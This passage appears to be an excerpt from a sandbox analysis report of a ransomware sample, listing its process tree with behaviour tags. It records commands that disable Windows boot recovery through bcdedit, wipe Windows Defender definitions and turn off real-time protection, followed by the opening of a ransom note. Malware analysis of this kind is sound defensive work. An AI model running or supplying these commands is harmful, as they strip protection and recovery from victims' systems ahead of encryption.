C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:632
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:1168
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵PID:1032
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1064
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true3⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
PID:540
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵PID:1904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1932
-
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\fwdM_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1420